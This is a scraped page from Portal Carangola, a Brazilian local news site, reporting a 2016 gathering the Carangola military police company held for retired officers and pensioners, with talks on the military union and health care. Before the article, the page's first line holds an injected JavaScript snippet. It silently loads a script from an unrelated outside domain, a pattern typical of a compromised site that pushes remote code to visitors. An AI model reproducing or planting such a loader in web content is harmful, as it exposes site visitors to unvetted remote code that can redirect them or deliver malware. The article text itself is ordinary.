;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); 75ª CIA PM Carangola realiza encontro com militares inativos da subárea. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

75ª CIA PM Carangola realiza encontro com militares inativos da subárea.

A 75ª Cia PM, na manhã de 19/05/16 realizou um encontro com os inativos, ativos e pensionistas no Salão Nobre do Núcleo Operacional de Floresta, Pesca e Biodiversidade – IEF de Carangola, visando promover a aproximação, união e valorização dos militares e pensionistas. Na ocasião foi servido um saboroso café e, logo após, ops presentes ouviram dos Presidentes dos Núcleos da UMMG de Manhuaçu, Sr. Cel QOR Assis e, de Juiz de Fora, Sr. Cel QOR Elvino, situações que envolvem a União dos Militares de MG, tiraram dúvidas, souberam da inclusão nos núcleos , ações judiciais em prol dos inativos e associados etc, etc. Em seguida, todos receberam uma cartilha de saúde, contendo orientações básicas sobre o uso e procedimentos existentes do Plano de Saúde do IPSM/PMMG e relação atualizada da Rede Credenciada de Carangola e Muriaé. Ainda, na oportunidade, os presentes ouviram uma palestra do Dr. Olavo Costa (Endocrinologista) conveniado com a PMMG, tendo como assunto “A importância da Endocrinologia para uma vida saudável” e, ao final recebeu das mãos do Sr. Maj Florindo, um certificado de agradecimento.

Para finalizar, todos se confraternizaram com um bate papo, relembrando os momentos passados na caserna, tendo o evento recebido altos elogios de todos os presentes, ocorrido num ambiente agradável e de grande harmonia.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.